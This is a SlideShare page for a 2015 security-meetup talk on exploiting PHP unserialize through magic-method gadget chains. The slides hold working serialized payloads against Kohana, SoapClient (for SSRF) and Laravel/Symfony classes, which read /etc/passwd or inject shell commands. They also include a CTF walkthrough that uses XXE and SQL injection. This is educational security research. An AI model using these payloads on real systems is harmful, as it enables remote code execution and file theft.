Mail.ru Group, profile picture
Uploaded byMail.ru Group
PDF, PPTX11,356 views

Security Meetup 22 октября. «PHP Unserialize Exploiting». Павел Топорков. Лаборатория Касперского

This document discusses exploiting PHP unserialization vulnerabilities. It begins by introducing the presenter and explaining why unserialization is insecure, as magic methods like __destruct can be executed after unserialization. Potential exploits are demonstrated through examples, including using unserialization to execute system commands and perform SSRF attacks. The document also notes that many PHP frameworks and libraries contain classes that could enable chaining multiple exploits through unserialization. It then describes the presenter's tool for analyzing PHP code to find possible exploit chains for unserialization vulnerabilities.

Embed presentation

Download as PDF, PPTX
PHP Unserialize Exploiting Mail.Ru Security Meetup. 22 Nov 2015 #securitymeetup
whoami Pavel Toporkov ● Work at Kaspersky Lab ● Security Researcher ● Bug Hunter ● RDot.Org team CTF player
why?
Unserialize unserialize — Creates a PHP value from a stored representation array("foo", "bar") ⇔ a:2:{i:0;s:3:"foo";i:1;s:3:"bar";}
Why it insecure? Magic methods can be executed after unserialization: __wakeup() __destruct() __toString() and so on...
Vulnerable example <?php class A { public $exitCmd; public function __destruct(){ system($this->exitCmd); } } unserialize($_GET['a']); ?> ?a=O:1:"A":{s:7:"exitCmd";s:15:"cat /etc/passwd"}
What if we won't use danger functions in magic methods?
More complex example <?php class DBConnect { public function __destruct(){ $this->db->close(); } } class Process { public function close(){ system("rm ${this->pidfile}.pid"); } }
Kohana (system/classes/Kohana/View.php) public function __toString(){ try { return $this->render(); } catch (Exception $e){ ... } } protected static function capture ($kohana_view_filename, array $kohana_view_data){ try { include $kohana_view_filename; } catch (Exception $e){ ... } } public function render($file){ ... View::capture($this->_file, $this->_data); }
Kohana Pwning POST /api.php HTTP/1.1 Host: hostname Content-Length: … Content-Type: application/x-www-form-urlencoded data=O:11:"Kohana_View":1:{s:8:"%00*%00_file";s:11:" /etc/passwd";}
What if there will no such chains in application code?
SSRF Unserializing SoapClient can provide SSRF with CRLF injection. O:10:"SoapClient":3:{s:3:"uri";s:18:"http://hostname/3%0a1"; s:8:"location";s:23:"http://hostname/123";s:13:" _soap_version";i:1;} [0] https://www.youtube.com/watch?v=5AdVQzUB6iM [1] http://raz0r.name/talks/confidence-2013-php-object-injection-revisited/
Composer Composer helps you declare, manage and install dependencies of PHP projects, ensuring you have the right stack everywhere. Actually it provide us a bunch of usable classes to build chains for unserialize exploiting. Just try to get size of your "vendor" directory.
What if we won't use unserialize with user's input data!
Another way PHP serialized data is often used to store PHP object in database. ● User sessions ● Application cache ● ...
WhoEver! PHD CTF 2015 Task Based on a true story. 0 solvers :(
WhoEver! (step 1) 1. Read robots.txt, find api.php file. 2. Find that api.php can process XML data. 3. Get the source code using XML External Entity. (composer. json and .git can help us to get all files)
WhoEver! (step 2) $params = unserialize($_GET["params"]); ... class User { public function save(){ ... Database::query( "INSERT INTO users (sess, user) VALUES('$this->sessid', '%s') ON DUPLICATE KEY UPDATE user='%s'", array($user, $user)); } public function __destruct(){ if ($this->needSave) $this->save(); } }
WhoEver! (step 3) public static function load($sessid){ ... $result = Database::query("SELECT user FROM users WHERE sess='$sessid'"); if ($result){ return unserialize($result["user"]); } else return new User($sessid); } Now we can exploit another unserialize with more classes available. Let's try to build chain...
WhoEver! (step 3) class Database { public function __destruct(){ $this->db->close(); } } class Engine { public function __call($name, $params) { ... return $this->loader->load($name, $shared); } } class Loader { public function load($name, $shared){ ... list($class, $params, $callback) = $this->classes[$name]; ... $this->newInstance($class, $params); ... } public function newInstance($class, $params) { if (is_callable($class)) { return call_user_func_array($class, $params); } }
Finding chains This project was 2MB. In real projects we have 100+MB of PHP source code. So finding chains to exploit unserialize is a big deal.
Let's code it!
Tool My approach: ● No static analysis. It slow and complex ● Just find starting point ● Then find all methods and check if it can be executed from this point. ● Repeat
Demo
Chain
Exploit (too long, cutted…) O:20:"IlluminateViewView":1:{s:10:"%00*%00factory";O:23:" IlluminateViewFactory":1:{s:9:"%00*%00events";O:42:" IlluminateFoundationConsoleServeCommand":3:{s:9:"%00*% 00output";O:43:" SymfonyComponentConsoleOutputNullOutput":0:{}s:8:"%00*% 00input";O:42:"SymfonyComponentConsoleInputArrayInput": 2:{s:10:"%00*%00options";a:2:{s:4:"host";s:12:"A;uname+-a; A";s:4:"port";s:2:"AA";}s:13:"%00*%00definition";O:47:" SymfonyComponentConsoleInputInputDefinition":1:{s:56:"% 00SymfonyComponentConsoleInputInputDefinition% 00options...
Results ● About 10 minutes to process 130MB of code ● Due to no static analysis it's extremely hard to auto- generate exploits P.S. Welcome to contribution!
Thanks! Questions? Pavel Toporkov @Paul_Axe http://paul-axe.blogspot.com/

More Related Content

PDF
PHP Object Injection Vulnerability in WordPress: an Analysis
byPositive Hack Days
 
PDF
ORM2Pwn: Exploiting injections in Hibernate ORM
byMikhail Egorov
 
PPT
Advanced Sql Injection ENG
byDmitry Evteev
 
PDF
ORM Injection
bySimone Onofri
 
PDF
Cross site scripting
byn|u - The Open Security Community
 
PPTX
Click jacking
byRonan Dunne, CEH, SSCP
 
PPT
Best!
bygofortution
 
PPTX
Ajax ppt - 32 slides
bySmithss25
 
PHP Object Injection Vulnerability in WordPress: an Analysis
byPositive Hack Days
 
ORM2Pwn: Exploiting injections in Hibernate ORM
byMikhail Egorov
 
Advanced Sql Injection ENG
byDmitry Evteev
 
ORM Injection
bySimone Onofri
 
Cross site scripting
byn|u - The Open Security Community
 
Click jacking
byRonan Dunne, CEH, SSCP
 
Best!
bygofortution
 
Ajax ppt - 32 slides
bySmithss25
 

What's hot

PPT
Java oops PPT
bykishu0005
 
PDF
SQL injection: Not Only AND 1=1 (updated)
byBernardo Damele A. G.
 
PPTX
HTTP HOST header attacks
byDefconRussia
 
PDF
Java Serialization
byimypraz
 
PDF
XXE
byn|u - The Open Security Community
 
PPTX
Deep understanding on Cross-Site Scripting and SQL Injection
byVishal Kumar
 
PPT
Basic Java Database Connectivity(JDBC)
bysuraj pandey
 
PDF
Database Firewall with Snort
byNarudom Roongsiriwong, CISSP
 
PPTX
Forging Trusts for Deception in Active Directory
byNikhil Mittal
 
PPTX
Web Cache Poisoning
byKuldeepPandya5
 
PPTX
SQL INJECTION
byMentorcs
 
PPTX
Understanding Cross-site Request Forgery
byDaniel Miessler
 
PPTX
Cross Site Scripting Defense Presentation
byIkhade Maro Igbape
 
PPTX
DoS or DDoS attack
bystollen_fusion
 
PPTX
Xss attack
byManjushree Mashal
 
PPTX
Eternal blue Vulnerability
bykandelrc
 
PPT
JavaScript: Events Handling
byYuriy Bezgachnyuk
 
PPTX
Buffer overflow attacks
byJoe McCarthy
 
PPTX
Cross Site Scripting (XSS)
byBarrel Software
 
PPT
Cyber terrorism
byanjalika sinha
 
Java oops PPT
bykishu0005
 
SQL injection: Not Only AND 1=1 (updated)
byBernardo Damele A. G.
 
HTTP HOST header attacks
byDefconRussia
 
Java Serialization
byimypraz
 
XXE
byn|u - The Open Security Community
 
Deep understanding on Cross-Site Scripting and SQL Injection
byVishal Kumar
 
Basic Java Database Connectivity(JDBC)
bysuraj pandey
 
Database Firewall with Snort
byNarudom Roongsiriwong, CISSP
 
Forging Trusts for Deception in Active Directory
byNikhil Mittal
 
Web Cache Poisoning
byKuldeepPandya5
 
SQL INJECTION
byMentorcs
 
Understanding Cross-site Request Forgery
byDaniel Miessler
 
Cross Site Scripting Defense Presentation
byIkhade Maro Igbape
 
DoS or DDoS attack
bystollen_fusion
 
Xss attack
byManjushree Mashal
 
Eternal blue Vulnerability
bykandelrc
 
JavaScript: Events Handling
byYuriy Bezgachnyuk
 
Buffer overflow attacks
byJoe McCarthy
 
Cross Site Scripting (XSS)
byBarrel Software
 
Cyber terrorism
byanjalika sinha
 

Viewers also liked

PDF
PHP unserialization vulnerabilities: What are we missing?
bySam Thomas
 
PPTX
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...
byMail.ru Group
 
PDF
PHP Object Injection
byMinded Security
 
PDF
Security Meetup 22 октября. «Опасное видео». Максим Андреев. Облако Mail.Ru
byMail.ru Group
 
PDF
Security Meetup 22 октября. «Мобилки, деньги, два фактора». Дмитрий Евдокимо...
byMail.ru Group
 
PPTX
Security Meetup 22 октября. «When big brick wall becomes wooden fence» or «ho...
byMail.ru Group
 
PHP unserialization vulnerabilities: What are we missing?
bySam Thomas
 
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...
byMail.ru Group
 
PHP Object Injection
byMinded Security
 
Security Meetup 22 октября. «Опасное видео». Максим Андреев. Облако Mail.Ru
byMail.ru Group
 
Security Meetup 22 октября. «Мобилки, деньги, два фактора». Дмитрий Евдокимо...
byMail.ru Group
 
Security Meetup 22 октября. «When big brick wall becomes wooden fence» or «ho...
byMail.ru Group
 

Similar to Security Meetup 22 октября. «PHP Unserialize Exploiting». Павел Топорков. Лаборатория Касперского

PPTX
OOP in PHP.pptx
byswitipatel4
 
PDF
New PHP Exploitation Techniques
byRIPS Technologies GmbH
 
PPT
Easy rest service using PHP reflection api
byMatthieu Aubry
 
PDF
Advanced Php - Macq Electronique 2010
byMichelangelo van Dam
 
ODP
Php in 2013 (Web-5 2013 conference)
byjulien pauli
 
PDF
Iterators, ArrayAccess & Countable (Oh My!) - Madison PHP 2014
bySandy Smith
 
PPT
John's Top PECL Picks
byJohn Coggeshall
 
PPTX
Serial Killers - or Deserialization for fun and profit
byblaufish
 
PDF
Preparing for the next PHP version (5.6)
byDamien Seguy
 
PDF
Closer look at PHP Unserialization by Ashwin Shenoi
byCysinfo Cyber Security Community
 
PDF
php_final_sy_semIV_notes_vision.pdf
byakankshasorate1
 
PDF
php_final_sy_semIV_notes_vision.pdf
byHarshuPawar4
 
PDF
php_final_sy_semIV_notes_vision.pdf
bysannykhopade
 
PDF
php_final_sy_semIV_notes_vision (3).pdf
bybhagyashri686896
 
PPTX
FFW Gabrovo PMG - PHP OOP Part 3
byToni Kolev
 
PDF
Barcelona 2010 hidden_features
byAnis Berejeb
 
ODP
What's new, what's hot in PHP 5.3
byJeremy Coates
 
PPTX
20 cool features that is in PHP 7, we missed in PHP 5. Let walkthrough with t...
byDrupalMumbai
 
PPT
How PHP Works ?
byRavi Raj
 
PDF
Breaking The Framework's Core #PHPKonf 2016
byMehmet Ince
 
OOP in PHP.pptx
byswitipatel4
 
New PHP Exploitation Techniques
byRIPS Technologies GmbH
 
Easy rest service using PHP reflection api
byMatthieu Aubry
 
Advanced Php - Macq Electronique 2010
byMichelangelo van Dam
 
Php in 2013 (Web-5 2013 conference)
byjulien pauli
 
Iterators, ArrayAccess & Countable (Oh My!) - Madison PHP 2014
bySandy Smith
 
John's Top PECL Picks
byJohn Coggeshall
 
Serial Killers - or Deserialization for fun and profit
byblaufish
 
Preparing for the next PHP version (5.6)
byDamien Seguy
 
Closer look at PHP Unserialization by Ashwin Shenoi
byCysinfo Cyber Security Community
 
php_final_sy_semIV_notes_vision.pdf
byakankshasorate1
 
php_final_sy_semIV_notes_vision.pdf
byHarshuPawar4
 
php_final_sy_semIV_notes_vision.pdf
bysannykhopade
 
php_final_sy_semIV_notes_vision (3).pdf
bybhagyashri686896
 
FFW Gabrovo PMG - PHP OOP Part 3
byToni Kolev
 
Barcelona 2010 hidden_features
byAnis Berejeb
 
What's new, what's hot in PHP 5.3
byJeremy Coates
 
20 cool features that is in PHP 7, we missed in PHP 5. Let walkthrough with t...
byDrupalMumbai
 
How PHP Works ?
byRavi Raj
 
Breaking The Framework's Core #PHPKonf 2016
byMehmet Ince
 

More from Mail.ru Group

PDF
Метапрограммирование: строим конечный автомат, Сергей Федоров, Яндекс.Такси
byMail.ru Group
 
PDF
Использование Fiddler и Charles при тестировании фронтенда проекта pulse.mail...
byMail.ru Group
 
PDF
CV в пайплайне распознавания ценников товаров: трюки и хитрости Николай Масл...
byMail.ru Group
 
PDF
WebAuthn в реальной жизни, Анатолий Остапенко
byMail.ru Group
 
PDF
Этика искусственного интеллекта, Александр Кармаев (AI Journey)
byMail.ru Group
 
PDF
Как не сделать врагами архитектуру и оптимизацию, Кирилл Березин, Mail.ru Group
byMail.ru Group
 
PDF
RAPIDS: ускоряем Pandas и scikit-learn на GPU Павел Клеменков, NVidia
byMail.ru Group
 
PDF
BDD для фронтенда. Автоматизация тестирования с Cucumber, Cypress и Jenkins, ...
byMail.ru Group
 
PDF
Другая сторона баг-баунти-программ: как это выглядит изнутри, Владимир Дубровин
byMail.ru Group
 
PDF
DAST в CI/CD, Ольга Свиридова
byMail.ru Group
 
PDF
Как мы захотели TWA и сделали его без мобильных разработчиков, Данила Стрелков
byMail.ru Group
 
PDF
Управление инцидентами в Почте Mail.ru, Антон Викторов
byMail.ru Group
 
PDF
Обзор трендов рекомендательных систем от Пульса, Андрей Мурашев (AI Journey)
byMail.ru Group
 
PDF
Почему вам стоит использовать свой велосипед и почему не стоит Александр Бел...
byMail.ru Group
 
PDF
Кейсы использования PWA для партнерских предложений в Delivery Club, Никита Б...
byMail.ru Group
 
PDF
Нейро-машинный перевод в вопросно-ответных системах, Федор Федоренко (AI Jour...
byMail.ru Group
 
PDF
Мир глазами нейросетей, Данила Байгушев, Александр Сноркин ()
byMail.ru Group
 
PDF
Конвергенция технологий как тренд развития искусственного интеллекта, Владими...
byMail.ru Group
 
PDF
Автоматизация без тест-инженеров по автоматизации, Мария Терехина и Владислав...
byMail.ru Group
 
PDF
AMP для электронной почты, Сергей Пешков
byMail.ru Group
 
Метапрограммирование: строим конечный автомат, Сергей Федоров, Яндекс.Такси
byMail.ru Group
 
Использование Fiddler и Charles при тестировании фронтенда проекта pulse.mail...
byMail.ru Group
 
CV в пайплайне распознавания ценников товаров: трюки и хитрости Николай Масл...
byMail.ru Group
 
WebAuthn в реальной жизни, Анатолий Остапенко
byMail.ru Group
 
Этика искусственного интеллекта, Александр Кармаев (AI Journey)
byMail.ru Group
 
Как не сделать врагами архитектуру и оптимизацию, Кирилл Березин, Mail.ru Group
byMail.ru Group
 
RAPIDS: ускоряем Pandas и scikit-learn на GPU Павел Клеменков, NVidia
byMail.ru Group
 
BDD для фронтенда. Автоматизация тестирования с Cucumber, Cypress и Jenkins, ...
byMail.ru Group
 
Другая сторона баг-баунти-программ: как это выглядит изнутри, Владимир Дубровин
byMail.ru Group
 
DAST в CI/CD, Ольга Свиридова
byMail.ru Group
 
Как мы захотели TWA и сделали его без мобильных разработчиков, Данила Стрелков
byMail.ru Group
 
Управление инцидентами в Почте Mail.ru, Антон Викторов
byMail.ru Group
 
Обзор трендов рекомендательных систем от Пульса, Андрей Мурашев (AI Journey)
byMail.ru Group
 
Почему вам стоит использовать свой велосипед и почему не стоит Александр Бел...
byMail.ru Group
 
Кейсы использования PWA для партнерских предложений в Delivery Club, Никита Б...
byMail.ru Group
 
Нейро-машинный перевод в вопросно-ответных системах, Федор Федоренко (AI Jour...
byMail.ru Group
 
Мир глазами нейросетей, Данила Байгушев, Александр Сноркин ()
byMail.ru Group
 
Конвергенция технологий как тренд развития искусственного интеллекта, Владими...
byMail.ru Group
 
Автоматизация без тест-инженеров по автоматизации, Мария Терехина и Владислав...
byMail.ru Group
 
AMP для электронной почты, Сергей Пешков
byMail.ru Group
 

Recently uploaded

PPTX
COMPUTER SECURITY MODELS - Frameworks that help organizations design secure s...
byAbhishek Sonker
 
PPTX
SP C PROGRAMMING BASIC CONCEPTS WITH SAMPLE CODE.pptx
byspunithasrit
 
PPTX
An Detailed Overview of Menus in Odoo 18
byCeline George
 
PDF
Conducting Systematic Literature Search.pdf
bySystematic Reviews Network (SRN)
 
PDF
An alumnus of the Swiss Management Center (SMC) University, Kwame Simpe Ofori...
bynservice241
 
PDF
MEDINIPUR QUIZ PREMIER LEAGUE PRACTICE QUIZ SET
bySaheb Mallik
 
PDF
the famous sun temple at konark, balck pagoda, orissa
byPrachiSontakke5
 
PDF
TNTEU- BD1TL Unit - 3 THEORY OF CONSTRUCTIVISM AND LEARNER CENTERED
byDr Raja Mohammed T
 
PDF
the jain temples at mount abu Dilwara temples
byPrachiSontakke5
 
PDF
EVOLUTION - Theories, Pre-Darwinism, Darwinism
byANAKHA JACOB
 
PDF
Meyers and Hudson Vitale "AI Essentials: From Tools to Strategies: A 2025 NIS...
byNational Information Standards Organization (NISO)
 
PDF
Graphics Graphics Graphics Graphics Graphics
byaidanattema
 
PDF
Herniation Syndromes - Neuro Imaging Master Series
bySean M. Fox
 
PDF
Approaches and Methods in Political Science -EVOLUTION OF POLITICAL THOUGHT -...
byDr Raja Mohammed T
 
PPTX
COPD (Chronic obstructive pulmonary disease) by ebadi.pptx
byEbadullah Khan
 
PPTX
unit 1 Introduction and Theoretical Foundations of educational technology.pptx
byKavitha Krishnan
 
PPTX
Structure and Functions of Cell (Unit I)
byPranaliChandurkar2
 
PPTX
TEACHING OF POETRY.pptx. The PPT helps and provides guidance on Lesson Planni...
byDr. Meeta Agrawal
 
PPTX
Types_of_Volcanoes_Presentation.pptx Science 8 Matatag
byNekoChan623496
 
PPTX
West Hatch Ski Trip - Wagrain 2026 - Induction Meeting 2
byWestHatch
 
COMPUTER SECURITY MODELS - Frameworks that help organizations design secure s...
byAbhishek Sonker
 
SP C PROGRAMMING BASIC CONCEPTS WITH SAMPLE CODE.pptx
byspunithasrit
 
An Detailed Overview of Menus in Odoo 18
byCeline George
 
Conducting Systematic Literature Search.pdf
bySystematic Reviews Network (SRN)
 
An alumnus of the Swiss Management Center (SMC) University, Kwame Simpe Ofori...
bynservice241
 
MEDINIPUR QUIZ PREMIER LEAGUE PRACTICE QUIZ SET
bySaheb Mallik
 
the famous sun temple at konark, balck pagoda, orissa
byPrachiSontakke5
 
TNTEU- BD1TL Unit - 3 THEORY OF CONSTRUCTIVISM AND LEARNER CENTERED
byDr Raja Mohammed T
 
the jain temples at mount abu Dilwara temples
byPrachiSontakke5
 
EVOLUTION - Theories, Pre-Darwinism, Darwinism
byANAKHA JACOB
 
Meyers and Hudson Vitale "AI Essentials: From Tools to Strategies: A 2025 NIS...
byNational Information Standards Organization (NISO)
 
Graphics Graphics Graphics Graphics Graphics
byaidanattema
 
Herniation Syndromes - Neuro Imaging Master Series
bySean M. Fox
 
Approaches and Methods in Political Science -EVOLUTION OF POLITICAL THOUGHT -...
byDr Raja Mohammed T
 
COPD (Chronic obstructive pulmonary disease) by ebadi.pptx
byEbadullah Khan
 
unit 1 Introduction and Theoretical Foundations of educational technology.pptx
byKavitha Krishnan
 
Structure and Functions of Cell (Unit I)
byPranaliChandurkar2
 
TEACHING OF POETRY.pptx. The PPT helps and provides guidance on Lesson Planni...
byDr. Meeta Agrawal
 
Types_of_Volcanoes_Presentation.pptx Science 8 Matatag
byNekoChan623496
 
West Hatch Ski Trip - Wagrain 2026 - Induction Meeting 2
byWestHatch
 

Security Meetup 22 октября. «PHP Unserialize Exploiting». Павел Топорков. Лаборатория Касперского

  • 1.
    PHP Unserialize Exploiting Mail.RuSecurity Meetup. 22 Nov 2015 #securitymeetup
  • 2.
    whoami Pavel Toporkov ● Workat Kaspersky Lab ● Security Researcher ● Bug Hunter ● RDot.Org team CTF player
  • 3.
  • 4.
    Unserialize unserialize — Createsa PHP value from a stored representation array("foo", "bar") ⇔ a:2:{i:0;s:3:"foo";i:1;s:3:"bar";}
  • 5.
    Why it insecure? Magicmethods can be executed after unserialization: __wakeup() __destruct() __toString() and so on...
  • 6.
    Vulnerable example <?php class A{ public $exitCmd; public function __destruct(){ system($this->exitCmd); } } unserialize($_GET['a']); ?> ?a=O:1:"A":{s:7:"exitCmd";s:15:"cat /etc/passwd"}
  • 7.
    What if wewon't use danger functions in magic methods?
  • 8.
    More complex example <?php classDBConnect { public function __destruct(){ $this->db->close(); } } class Process { public function close(){ system("rm ${this->pidfile}.pid"); } }
  • 9.
    Kohana (system/classes/Kohana/View.php) public function__toString(){ try { return $this->render(); } catch (Exception $e){ ... } } protected static function capture ($kohana_view_filename, array $kohana_view_data){ try { include $kohana_view_filename; } catch (Exception $e){ ... } } public function render($file){ ... View::capture($this->_file, $this->_data); }
  • 10.
    Kohana Pwning POST /api.phpHTTP/1.1 Host: hostname Content-Length: … Content-Type: application/x-www-form-urlencoded data=O:11:"Kohana_View":1:{s:8:"%00*%00_file";s:11:" /etc/passwd";}
  • 11.
    What if therewill no such chains in application code?
  • 12.
    SSRF Unserializing SoapClient canprovide SSRF with CRLF injection. O:10:"SoapClient":3:{s:3:"uri";s:18:"http://hostname/3%0a1"; s:8:"location";s:23:"http://hostname/123";s:13:" _soap_version";i:1;} [0] https://www.youtube.com/watch?v=5AdVQzUB6iM [1] http://raz0r.name/talks/confidence-2013-php-object-injection-revisited/
  • 14.
    Composer Composer helps youdeclare, manage and install dependencies of PHP projects, ensuring you have the right stack everywhere. Actually it provide us a bunch of usable classes to build chains for unserialize exploiting. Just try to get size of your "vendor" directory.
  • 15.
    What if wewon't use unserialize with user's input data!
  • 16.
    Another way PHP serializeddata is often used to store PHP object in database. ● User sessions ● Application cache ● ...
  • 17.
    WhoEver! PHD CTF 2015Task Based on a true story. 0 solvers :(
  • 18.
    WhoEver! (step 1) 1.Read robots.txt, find api.php file. 2. Find that api.php can process XML data. 3. Get the source code using XML External Entity. (composer. json and .git can help us to get all files)
  • 19.
    WhoEver! (step 2) $params= unserialize($_GET["params"]); ... class User { public function save(){ ... Database::query( "INSERT INTO users (sess, user) VALUES('$this->sessid', '%s') ON DUPLICATE KEY UPDATE user='%s'", array($user, $user)); } public function __destruct(){ if ($this->needSave) $this->save(); } }
  • 20.
    WhoEver! (step 3) publicstatic function load($sessid){ ... $result = Database::query("SELECT user FROM users WHERE sess='$sessid'"); if ($result){ return unserialize($result["user"]); } else return new User($sessid); } Now we can exploit another unserialize with more classes available. Let's try to build chain...
  • 21.
    WhoEver! (step 3) classDatabase { public function __destruct(){ $this->db->close(); } } class Engine { public function __call($name, $params) { ... return $this->loader->load($name, $shared); } } class Loader { public function load($name, $shared){ ... list($class, $params, $callback) = $this->classes[$name]; ... $this->newInstance($class, $params); ... } public function newInstance($class, $params) { if (is_callable($class)) { return call_user_func_array($class, $params); } }
  • 22.
    Finding chains This projectwas 2MB. In real projects we have 100+MB of PHP source code. So finding chains to exploit unserialize is a big deal.
  • 23.
  • 24.
    Tool My approach: ● Nostatic analysis. It slow and complex ● Just find starting point ● Then find all methods and check if it can be executed from this point. ● Repeat
  • 25.
  • 26.
  • 27.
    Exploit (too long,cutted…) O:20:"IlluminateViewView":1:{s:10:"%00*%00factory";O:23:" IlluminateViewFactory":1:{s:9:"%00*%00events";O:42:" IlluminateFoundationConsoleServeCommand":3:{s:9:"%00*% 00output";O:43:" SymfonyComponentConsoleOutputNullOutput":0:{}s:8:"%00*% 00input";O:42:"SymfonyComponentConsoleInputArrayInput": 2:{s:10:"%00*%00options";a:2:{s:4:"host";s:12:"A;uname+-a; A";s:4:"port";s:2:"AA";}s:13:"%00*%00definition";O:47:" SymfonyComponentConsoleInputInputDefinition":1:{s:56:"% 00SymfonyComponentConsoleInputInputDefinition% 00options...
  • 28.
    Results ● About 10minutes to process 130MB of code ● Due to no static analysis it's extremely hard to auto- generate exploits P.S. Welcome to contribution!
  • 29.